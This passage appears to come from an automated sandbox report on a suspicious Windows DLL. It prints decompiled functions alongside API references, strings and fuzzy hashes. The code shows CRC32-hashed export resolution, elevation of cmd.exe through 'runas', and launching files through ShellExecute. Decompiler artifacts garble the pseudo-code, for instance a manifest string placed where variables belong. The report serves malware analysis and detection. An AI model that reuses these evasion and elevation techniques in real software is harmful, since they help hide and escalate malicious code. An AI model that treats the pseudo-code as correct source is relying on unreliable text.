processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" + 1;
								goto L33;
							}
							_push(0x1f);
							L6ECAC0B6();
							goto L15;
						}
						Sleep(0x3e8);
						_push(0);
					}
					goto L11;
				}
				_t43 = "mlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x0
				if(_t43 <= 0) {
					goto L3;
				}
				"mlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = "mlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" - 1;
				_push(0);
				while(InterlockedCompareExchange(0x6ecb0964, 1, ??) != 0) {
					Sleep(0x3e8);
					_push(0);
				}
				_t20 =  *0x6ecb0960; // 0x0
				if(_t20 == 2) {
					_t26 =  *0x6ecb096c; // 0x0
					__eflags = _t26;
					if(_t26 == 0) {
						L32:
						 *0x6ecb0960 = 0;
						InterlockedExchange(0x6ecb0964, 0);
						goto L33;
					}
					_t38 =  *0x6ecb0968; // 0x0
					_t39 = _t38 + 0xfffffffc;
					while(1) {
						__eflags = _t39 - _t26;
						if(_t39 < _t26) {
							break;
						}
						_t22 =  *_t39;
						__eflags = _t22;
						if(_t22 != 0) {
							 *_t22();
						}
						_t39 = _t39 - 4;
						__eflags = _t39;
					}
					free(_t26);
					 *0x6ecb0968 =  *0x6ecb0968 & 0x00000000;
					 *0x6ecb096c =  *0x6ecb096c & 0x00000000;
					__eflags =  *0x6ecb096c;
					goto L32;
				}
				_push(0x1f);
				L6ECAC0B6();
				goto L33;
			}

0x6ecabbcb
0x6ecabbf3
0x6ecabbf7
0x6ecabd3b
0x00000000
0x6ecabd3d
0x6ecabc04
0x6ecabc0d
0x6ecabc10
0x6ecabc29
0x6ecabc2b
0x6ecabc2d
0x6ecabc2f
0x00000000
0x00000000
0x6ecabc18
0x6ecabc1a
0x6ecabc33
0x6ecabc3a
0x6ecabc3a
0x6ecabc41
0x6ecabc42
0x6ecabc44
0x6ecabc59
0x6ecabc63
0x6ecabc6a
0x6ecabc6c
0x6ecabbec
0x00000000
0x6ecabbec
0x6ecabc72
0x6ecabc77
0x6ecabc7c
0x6ecabc82
0x6ecabc88
0x6ecabc8b
0x6ecabc8e
0x6ecabc92
0x6ecabc92
0x6ecabc98
0x6ecabc9e
0x6ecabca0
0x6ecabca5
0x6ecabcab
0x6ecabcad
0x6ecabcb6
0x6ecabcb6
0x6ecabcad
0x6ecabcbc
0x00000000
0x6ecabcbc
0x6ecabc46
0x6ecabc48
0x00000000
0x6ecabc48
0x6ecabc21
0x6ecabc27
0x6ecabc27
0x00000000
0x6ecabc31
0x6ecabbcd
0x6ecabbd3
0x00000000
0x00000000
0x6ecabbd5
0x6ecabbe1
0x6ecabcd1
0x6ecabcc9
0x6ecabccf
0x6ecabccf
0x6ecabcda
0x6ecabce2
0x6ecabcee
0x6ecabcf4
0x6ecabcf6
0x6ecabd28
0x6ecabd2b
0x6ecabd35
0x00000000
0x6ecabd35
0x6ecabcf8
0x6ecabcfe
0x6ecabd0e
0x6ecabd0e
0x6ecabd10
0x00000000
0x00000000
0x6ecabd03
0x6ecabd05
0x6ecabd07
0x6ecabd09
0x6ecabd09
0x6ecabd0b
0x6ecabd0b
0x6ecabd0b
0x6ecabd13
0x6ecabd19
0x6ecabd20
0x6ecabd20
0x00000000
0x6ecabd27
0x6ecabce4
0x6ecabce6
0x00000000

APIs

InterlockedCompareExchange.KERNEL32(6ECB0964,?,00000000), ref: 6ECABC2B
_amsg_exit.MSVCRT ref: 6ECABC48
InterlockedExchange.KERNEL32(6ECB0964,00000000), ref: 6ECABC92
Sleep.KERNEL32(000003E8), ref: 6ECABCC9
InterlockedCompareExchange.KERNEL32(6ECB0964,00000001,00000000), ref: 6ECABCD4
_amsg_exit.MSVCRT ref: 6ECABCE6
free.MSVCRT(00000000), ref: 6ECABD13
InterlockedExchange.KERNEL32(6ECB0964,00000000), ref: 6ECABD35

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: ExchangeInterlocked$Compare_amsg_exit$Sleepfree
String ID:
API String ID: 1670123637-0
Opcode ID: d5c2447d12fe669750a5e7d24232425520560f376ec0823f886e597efcf1d441
Instruction ID: 0d18021f2b6a76bf5fa48d4c0a64a963312d529dadddb6a2fcdcaf95438f17a0
Opcode Fuzzy Hash: d5c2447d12fe669750a5e7d24232425520560f376ec0823f886e597efcf1d441
Instruction Fuzzy Hash: 9F41817294560BDFEB409BEE9A85F9A3778BF42329F004529FB119A18DFB3194418B11

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA5060, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 69
threadCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E6ECA5060(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v256;
				char _v264;
				intOrPtr _t11;
				intOrPtr _t18;
				void* _t21;
				intOrPtr _t22;
				void* _t23;
				char* _t24;
				void* _t29;

				_t24 =  &_v264;
				_t18 = _a12;
				_t22 = _a8;
				_t21 = 0;
				if(_t22 != 0 || _t18 != 0) {
					_t29 = M6ECB050C - _t21; // 0x0
					if(_t29 != 0) {
						E6ECA3700("USBManager", 0);
						_t24 =  &(_t24[8]);
					}
					if(_t22 == 0) {
						if(_t18 == 0) {
							goto L8;
						}
						goto L9;
					} else {
						_t11 = M6ECB057C; // 0x0
						wsprintfA( &_v264, "%s%s%c", "Global\\", _t11, 0x52);
						_t23 = OpenEventA(2, 0,  &_v256);
						if(_t23 == 0) {
							goto L10;
						} else {
							SetEvent(_t23);
							CloseHandle(_t23);
							return _t21;
						}
					}
				} else {
					L8:
					_push(0);
					_t21 = E6ECA4FE0(_a4);
					L9:
					CloseHandle(CreateThread(0, 0, 0x6eca2d50, 0, 0, 0));
					L10:
					return _t21;
				}
			}

0x6eca5060
0x6eca5067
0x6eca506f
0x6eca5077
0x6eca507b
0x6eca5081
0x6eca5087
0x6eca5090
0x6eca5095
0x6eca5095
0x6eca509a
0x6eca50ed
0x00000000
0x00000000
0x00000000
0x6eca509c
0x6eca509c
0x6eca50b3
0x6eca50cb
0x6eca50cf
0x00000000
0x6eca50d1
0x6eca50d2
0x6eca50d9
0x6eca50ea
0x6eca50ea
0x6eca50cf
0x6eca50ef
0x6eca50ef
0x6eca50f6
0x6eca5101
0x6eca5103
0x6eca5119
0x6eca511f
0x6eca512a
0x6eca512a

APIs

wsprintfA.USER32 ref: 6ECA50B3
OpenEventA.KERNEL32(00000002,00000000,?), ref: 6ECA50C5
SetEvent.KERNEL32(00000000), ref: 6ECA50D2
CloseHandle.KERNEL32(00000000), ref: 6ECA50D9
CreateThread.KERNEL32 ref: 6ECA5112
CloseHandle.KERNEL32(00000000), ref: 6ECA5119

Strings

Global\, xrefs: 6ECA50A4
%s%s%c, xrefs: 6ECA50AD
USBManager, xrefs: 6ECA508B

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseEventHandle$CreateOpenThreadwsprintf
String ID: %s%s%c$Global\$USBManager
API String ID: 1587369599-1541125816
Opcode ID: 292c0cd5cff24c4b9635e4461da13a40e671845aa5d9328e71ac2081b92c54e4
Instruction ID: 29d9725330f17b246bbdd0fa19c3c1476ef1298472b56adea02af017a3faaa1b
Opcode Fuzzy Hash: 292c0cd5cff24c4b9635e4461da13a40e671845aa5d9328e71ac2081b92c54e4
Instruction Fuzzy Hash: 47113D76B40B126BE66056DC9D06FDF3B38AF85B16F008424FF549B284FA6594098FF1

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA9C50, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 62
windowCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E6ECA9C50(struct HWND__* _a4, intOrPtr _a8, char _a12) {
				intOrPtr _t5;
				void* _t15;
				char _t21;
				struct HWND__* _t26;

				_t5 = _a8;
				if(_t5 == 0) {
					_t26 = _a4;
					SetWindowLongA(_t26, 0xffffffec, GetWindowLongA(_t26, 0xffffffec) | 0x00000008);
					SetWindowPos(_t26, 0xffffffff, 0, 0, 0, 0, 3);
					BringWindowToTop(_t26);
					SetForegroundWindow(_t26);
					SendMessageA(_t26, 0x473, 1, 1);
					SendMessageA(_t26, 0x46f, 8, 0);
					goto L7;
				} else {
					_t15 = _t5 - 2;
					if(_t15 == 0) {
						_t21 = "\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x0
						_push(0);
						_push(0);
						_push(0);
						if(E6ECA4230("runas", "cmd.exe", _t21) != 0) {
							goto L7;
						} else {
							return 1;
						}
					} else {
						if(_t15 != 0x83f0) {
							L7:
							return 0;
						} else {
							"\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = _a12;
							return 0;
						}
					}
				}
			}

0x6eca9c54
0x6eca9c57
0x6eca9ca3
0x6eca9cb8
0x6eca9ccb
0x6eca9cd2
0x6eca9cd9
0x6eca9cef
0x6eca9cfb
0x00000000
0x6eca9c59
0x6eca9c59
0x6eca9c5c
0x6eca9c77
0x6eca9c7d
0x6eca9c7f
0x6eca9c81
0x6eca9c98
0x00000000
0x6eca9c9a
0x6eca9c9f
0x6eca9c9f
0x6eca9c5e
0x6eca9c63
0x6eca9cff
0x6eca9d01
0x6eca9c69
0x6eca9c6d
0x6eca9c74
0x6eca9c74
0x6eca9c63
0x6eca9c5c

APIs

GetWindowLongA.USER32 ref: 6ECA9CAB
SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 6ECA9CB8
SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,?,?,?,?,00000001,FF000000), ref: 6ECA9CCB
BringWindowToTop.USER32 ref: 6ECA9CD2
SetForegroundWindow.USER32(00000000), ref: 6ECA9CD9
SendMessageA.USER32 ref: 6ECA9CEF
SendMessageA.USER32 ref: 6ECA9CFB

Strings

cmd.exe, xrefs: 6ECA9C84
runas, xrefs: 6ECA9C89

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$LongMessageSend$BringForeground
String ID: cmd.exe$runas
API String ID: 4108379202-3213582026
Opcode ID: 8935af0231bab59f392f7ddf92d5b4d13913850429e8ad61a1b0eac9cf660c6b
Instruction ID: 99eb0538a8af6561b769b654f8e2245a36a92b95f52433eec61a25cbf6c2327b
Opcode Fuzzy Hash: 8935af0231bab59f392f7ddf92d5b4d13913850429e8ad61a1b0eac9cf660c6b
Instruction Fuzzy Hash: 69112B32295B117BE6105B6C8D0BFDF3A78EB82B25F104214FB11EB1C4E7B06100CB69

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA69C0, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E6ECA69C0(CHAR* _a4, signed int _a8, intOrPtr _a12, signed char _a16) {
				char _v8;
				char _v11;
				char _v12;
				short _v15;
				char _v16;
				CHAR* _t19;
				CHAR* _t21;
				CHAR* _t22;
				CHAR* _t24;
				signed char _t26;
				signed int _t27;
				CHAR* _t30;
				CHAR* _t35;
				CHAR* _t39;
				CHAR* _t40;
				CHAR* _t43;
				CHAR* _t46;
				CHAR* _t48;

				_t19 = M6ECB04CC; // 0xcb2da8
				_t40 = M6ECB04DC; // 0x0
				_t46 = _a4;
				_v16 = 0x6e6468;
				WritePrivateProfileStringA(_t40,  &_v16, _t46, _t19);
				_t21 = M6ECB04CC; // 0xcb2da8
				_t22 = M6ECB04DC; // 0x0
				asm("sbb ecx, ecx");
				_t35 =  ~_t46 & _a8;
				_v15 = 0x70;
				WritePrivateProfileStringA(_t22,  &_v16, _t35, _t21);
				_t24 = M6ECB04CC; // 0xcb2da8
				asm("sbb esi, esi");
				_t48 =  ~_t46 &  &_v12;
				_t43 = M6ECB04DC; // 0x0
				_v12 = (_t35 & 0xffffff00 | _a12 != 0x00000000) + 0x30;
				_v11 = 0;
				_v15 = 0x73;
				WritePrivateProfileStringA(_t43,  &_v16, _t48, _t24);
				_t26 = _a16;
				_v15 = 0x74;
				_t27 = _t26 & 0x000000ff;
				if(_t26 == 0) {
					_t27 = 0xc;
				}
				wsprintfA( &_v12, "%d", _t27);
				_t39 = M6ECB04CC; // 0xcb2da8
				_t30 = M6ECB04DC; // 0x0
				return WritePrivateProfileStringA(_t30,  &_v8, _t48, _t39);
			}

0x6eca69c3
0x6eca69c8
0x6eca69cf
0x6eca69e2
0x6eca69ea
0x6eca69ec
0x6eca69f6
0x6eca69fb
0x6eca69fd
0x6eca6a08
0x6eca6a0d
0x6eca6a14
0x6eca6a21
0x6eca6a28
0x6eca6a2a
0x6eca6a30
0x6eca6a3b
0x6eca6a40
0x6eca6a45
0x6eca6a47
0x6eca6a4d
0x6eca6a54
0x6eca6a57
0x6eca6a59
0x6eca6a59
0x6eca6a69
0x6eca6a6f
0x6eca6a75
0x6eca6a8c

APIs

WritePrivateProfileStringA.KERNEL32 ref: 6ECA69EA
WritePrivateProfileStringA.KERNEL32(00000000,00CB2DA8,?,00CB2DA8), ref: 6ECA6A0D
WritePrivateProfileStringA.KERNEL32(00000000,?,?,00CB2DA8), ref: 6ECA6A45
wsprintfA.USER32 ref: 6ECA6A69
WritePrivateProfileStringA.KERNEL32(00000000,?,?,00CB2DA8), ref: 6ECA6A85

Strings

hdn, xrefs: 6ECA69E2
s, xrefs: 6ECA6A40
t, xrefs: 6ECA6A4D

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfileStringWrite$wsprintf
String ID: hdn$s$t
API String ID: 2965074233-1328931711
Opcode ID: 8cc1780c7d52593f6a8324cf81de207c09a9895663850f0bc0a44f8f8d7ba8f3
Instruction ID: 9e95a104d66d1dd2931d9cb6f2da7f42790198d88a03cc32e02031937230cece
Opcode Fuzzy Hash: 8cc1780c7d52593f6a8324cf81de207c09a9895663850f0bc0a44f8f8d7ba8f3
Instruction Fuzzy Hash: A4213D72108652EFD704DF58C945E6BB7F9EFC9244F048A0CF99497251E274AE0CCBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA8230, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E6ECA8230(WCHAR* _a4, WCHAR* _a8) {
				long _t4;
				WCHAR* _t11;
				WCHAR* _t12;
				void* _t13;

				_t12 = _a4;
				_t11 = _a8;
				if(_t12 == 0 || _t11 == 0) {
					L7:
					_push(_t11);
					_push(_t12);
					M6ECB05F8();
					return _t4;
				} else {
					_t4 = GetFileAttributesW(_t12);
					if((_t4 & 0xffffffef) == 0) {
						goto L7;
					} else {
						_t4 = lstrcmpiW(PathFindFileNameW(_t11), L"run");
						if(_t4 != 0) {
							goto L7;
						} else {
							SetLastError(_t4);
							_t13 = E6ECAA2F0(_t12, 0, 0);
							if(_t13 != 0) {
								_push(0);
								_push(0);
								_push(1);
								E6ECA4230("open", _t13, 0);
								HeapFree(GetProcessHeap(), 0, _t13);
							}
							return 0;
						}
					}
				}
			}

0x6eca8231
0x6eca8236
0x6eca823c
0x6eca82ae
0x6eca82ae
0x6eca82af
0x6eca82b0
0x6eca82b8
0x6eca8242
0x6eca8243
0x6eca824e
0x00000000
0x6eca8250
0x6eca825d
0x6eca8265
0x00000000
0x6eca8267
0x6eca8268
0x6eca8278
0x6eca827f
0x6eca8281
0x6eca8283
0x6eca8285
0x6eca828f
0x6eca82a1
0x6eca82a1
0x6eca82ab
0x6eca82ab
0x6eca8265
0x6eca824e

APIs

GetFileAttributesW.KERNEL32(?), ref: 6ECA8243
PathFindFileNameW.SHLWAPI(?,run), ref: 6ECA8256
lstrcmpiW.KERNEL32(00000000), ref: 6ECA825D
SetLastError.KERNEL32(00000000), ref: 6ECA8268

Part of subcall function 6ECAA2F0: WideCharToMultiByte.KERNEL32(0000009C,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,00000000,6ECA6F16,00CD21B8,00000001,0000009C), ref: 6ECAA311
Part of subcall function 6ECAA2F0: GetProcessHeap.KERNEL32(00000008,00000001,?,00000000,?,00000000,6ECA6F16,00CD21B8,00000001,0000009C,00000000,00000034,?,?,?,6ECB03A0), ref: 6ECAA323
Part of subcall function 6ECAA2F0: HeapAlloc.KERNEL32(00000000,?,00000000,?,00000000,6ECA6F16,00CD21B8,00000001,0000009C,00000000,00000034,?,?,?,6ECB03A0,0000009C), ref: 6ECAA32A
Part of subcall function 6ECAA2F0: WideCharToMultiByte.KERNEL32(0000009C,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,00000000,6ECA6F16,00CD21B8,00000001,0000009C), ref: 6ECAA33E

Part of subcall function 6ECA4230: RtlZeroMemory.NTDLL(0000003C,0000003C), ref: 6ECA423A
Part of subcall function 6ECA4230: ShellExecuteExA.SHELL32(0000003C,00000000,00000000), ref: 6ECA42A7
Part of subcall function 6ECA4230: WaitForSingleObject.KERNEL32(?,?), ref: 6ECA42CD
Part of subcall function 6ECA4230: GetExitCodeProcess.KERNEL32 ref: 6ECA42E1
Part of subcall function 6ECA4230: CloseHandle.KERNEL32(?), ref: 6ECA42EC

GetProcessHeap.KERNEL32(00000000,00000000), ref: 6ECA829A
HeapFree.KERNEL32(00000000), ref: 6ECA82A1

Strings

open, xrefs: 6ECA828A
run, xrefs: 6ECA8250

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$ByteCharFileMultiWide$AllocAttributesCloseCodeErrorExecuteExitFindFreeHandleLastMemoryNameObjectPathShellSingleWaitZerolstrcmpi
String ID: open$run
API String ID: 2941314601-2128457515
Opcode ID: d779492ca9bdb623de3e935b5e04c161a5c0c2e360bad5f3c762104374e37ea2
Instruction ID: b2702ae938035edfb7acfe470bff57e3711b19442547c4d17e4b6d18431e1dd1
Opcode Fuzzy Hash: d779492ca9bdb623de3e935b5e04c161a5c0c2e360bad5f3c762104374e37ea2
Instruction Fuzzy Hash: 2301FC33645E126BD6502AEC8D0DFDF7E3EAF82B25F020600FF04A7184F76498028AA4

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA1DB0, Relevance: 13.6, APIs: 9, Instructions: 147
stringlibraryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E6ECA1DB0() {
				short _t58;
				signed int _t60;
				signed int _t61;
				signed int _t63;
				signed int _t72;
				signed int _t73;
				intOrPtr _t77;
				signed int _t78;
				CHAR* _t80;
				signed int _t83;
				signed int _t89;
				intOrPtr* _t90;
				char* _t96;
				intOrPtr* _t101;
				char* _t103;
				CHAR* _t106;
				char* _t108;
				CHAR* _t109;
				short _t112;
				struct HINSTANCE__* _t115;
				void* _t116;

				_t101 =  *((intOrPtr*)(_t116 + 0x3c));
				_t58 = 1;
				 *(_t116 + 0x14) = 1;
				if(_t101 == 0 ||  *_t101 != 0x5a4d) {
					L28:
					return _t58;
				} else {
					_t83 =  *((intOrPtr*)(_t101 + 0x3c)) + _t101;
					 *(_t116 + 0x24) = _t83;
					if( *_t83 != 0x4550) {
						goto L28;
					}
					_t77 =  *((intOrPtr*)(_t83 + 0x78));
					_t78 = _t77 + _t101;
					 *(_t116 + 0x24) =  *((intOrPtr*)(_t77 + _t101 + 0x1c)) + _t101;
					 *(_t116 + 0x20) =  *((intOrPtr*)(_t78 + 0x24)) + _t101;
					_t89 =  *((intOrPtr*)(_t78 + 0x20)) + _t101;
					 *(_t116 + 0x14) = _t78;
					 *(_t116 + 0x1c) = _t89;
					 *(_t116 + 0xc) = 0;
					if( *((intOrPtr*)(_t78 + 0x18)) <= 0) {
						L27:
						return _t58;
					}
					while(1) {
						_t106 =  *((intOrPtr*)(_t89 +  *(_t116 + 0x14) * 4)) + _t101;
						_t60 = RtlComputeCrc32(0, _t106, lstrlenA(_t106));
						_t96 =  *(_t116 + 0x50);
						_t61 = _t60 ^  *(_t116 + 0x54);
						_t112 = 0;
						if(_t96 <= 0) {
							goto L25;
						}
						_t90 =  *((intOrPtr*)(_t116 + 0x4c));
						while(_t61 !=  *_t90) {
							_t112 = _t112 + 1;
							_t90 = _t90 + 0x10;
							if(_t112 < _t96) {
								continue;
							}
							goto L25;
						}
						_t103 =  *((intOrPtr*)( *((intOrPtr*)(_t116 + 0x2c)) + ( *( *((intOrPtr*)(_t116 + 0x28)) +  *(_t116 + 0x14) * 2) & 0x0000ffff) * 4)) +  *((intOrPtr*)(_t116 + 0x48));
						 *((intOrPtr*)(_t116 + 0x10)) = _t112;
						if(_t103 == 0 || _t103 < _t78 || _t103 >=  *((intOrPtr*)( *((intOrPtr*)(_t116 + 0x30)) + 0x7c)) + _t78) {
							L22:
							 *( *((intOrPtr*)(_t116 + 0x4c)) + 0xc + (_t112 + _t112) * 8) = _t103;
							_t101 =  *((intOrPtr*)(_t116 + 0x48));
							if(_t103 == 0) {
								 *(_t116 + 0x20) = 0;
							}
						} else {
							_t80 = StrDupA(_t103);
							if(_t80 == 0) {
								L24:
								_t78 =  *(_t116 + 0x1c);
								_t101 =  *((intOrPtr*)(_t116 + 0x48));
								goto L25;
							}
							 *(_t116 + 0x20) = 0;
							_t108 = StrChrA(_t80, 0x2e);
							if(_t108 == 0) {
								L20:
								LocalFree(_t80);
								if( *((intOrPtr*)(_t116 + 0x18)) == 0) {
									goto L24;
								}
								_t78 =  *(_t116 + 0x1c);
								goto L22;
							}
							 *_t108 = 0;
							_t109 = _t108 + 1;
							_t115 = GetModuleHandleA(_t80);
							if(_t115 != 0) {
								L18:
								 *(_t116 + 0x1c) = 1;
								_t72 = RtlComputeCrc32(0, _t109, lstrlenA(_t109));
								_t73 =  *(_t116 + 0x54);
								_push(_t73);
								_push(0x10);
								_push(_t116 + 0x3c);
								_push(_t115);
								 *(_t116 + 0x44) = _t72 ^ _t73;
								 *((intOrPtr*)(_t116 + 0x48)) = 0;
								 *((intOrPtr*)(_t116 + 0x4c)) = 0;
								 *(_t116 + 0x50) = 0;
								E6ECA1DB0();
								_t103 =  *(_t116 + 0x50);
								_t116 = _t116 + 0x10;
								L19:
								_t112 =  *((intOrPtr*)(_t116 + 0x10));
								goto L20;
							}
							_t115 = LoadLibraryA(_t80);
							if(_t115 == 0) {
								goto L19;
							}
							goto L18;
						}
						L25:
						_t63 =  *(_t116 + 0x14) + 1;
						 *(_t116 + 0x14) = _t63;
						if(_t63 <  *((intOrPtr*)(_t78 + 0x18))) {
							_t89 =  *(_t116 + 0x24);
							continue;
						}
						_t58 =  *(_t116 + 0x20);
						goto L27;
					}
				}
			}

0x6eca1db4
0x6eca1db8
0x6eca1dbd
0x6eca1dc3
0x6eca1f91
0x6eca1f91
0x6eca1dd7
0x6eca1dda
0x6eca1de2
0x6eca1de6
0x00000000
0x00000000
0x6eca1ded
0x6eca1df4
0x6eca1df8
0x6eca1e01
0x6eca1e08
0x6eca1e0e
0x6eca1e12
0x6eca1e16
0x6eca1e1e
0x6eca1f8c
0x00000000
0x6eca1f8c
0x6eca1e34
0x6eca1e3b
0x6eca1e48
0x6eca1e4d
0x6eca1e51
0x6eca1e55
0x6eca1e59
0x00000000
0x00000000
0x6eca1e5f
0x6eca1e63
0x6eca1e67
0x6eca1e68
0x6eca1e6d
0x00000000
0x00000000
0x00000000
0x6eca1e6f
0x6eca1e87
0x6eca1e8b
0x6eca1e8f
0x6eca1f50
0x6eca1f56
0x6eca1f5c
0x6eca1f60
0x6eca1f62
0x6eca1f62
0x6eca1eae
0x6eca1eb5
0x6eca1eb9
